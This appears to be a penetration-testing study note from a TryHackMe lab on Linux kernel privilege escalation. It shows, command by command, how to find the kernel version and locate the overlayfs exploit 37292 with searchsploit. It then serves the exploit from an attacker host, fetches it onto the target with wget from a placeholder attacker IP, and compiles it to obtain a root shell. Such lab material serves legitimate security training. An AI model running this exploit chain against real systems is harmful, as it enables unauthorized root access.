# Kernel exploit

> The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.

### Example

Given that a remote shell is gained on a Linux Ubuntu machine with a low-privileged user. A few important information can be gathered from the enumeration commands discussed in the previous section under `Enumeration`.

1. Gather information on the kernel version

```bash
$ cat /proc/version
Linux version 3.13.0-24-generic ...

# OR

$ uname -a
Linux ... 3.13.0-24-generic ...
```

2. Search for vulnerabilities

**From the attacker machine**

```bash
$ searchsploit linux kernel 3.13

...
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37293.txt
...
```

Or directly from Exploit-DB:

{% embed url="<https://www.exploit-db.com/exploits/37292>" %}

**Look for the exploit code and run a Python web server to serve the content**

```bash
$ find / -path '*linux/local/37292.c' 2>/dev/null
/usr/share/exploitdb/exploits/linux/local/37292.c

$ cd /usr/share/exploitdb/exploits/linux/local

...linux/local$ python3 -m http.server 8888
```

3. Navigate to a directory with write and execute permissions for all such as `/tmp`

**From the target machine**

```bash
$ find / -perm 003 -type d 2>/dev/null
/tmp
...

$ cd /tmp
$ wget http://<attacker_ip>:<port>/37292.c
...

$ gcc 37292.c -o 37292
$ ./37292.out

...

root# whoami
root

root# ...
```

Adapted from task 5 of the TryHackMe practice room:

{% embed url="<https://tryhackme.com/r/room/linprivesc>" %}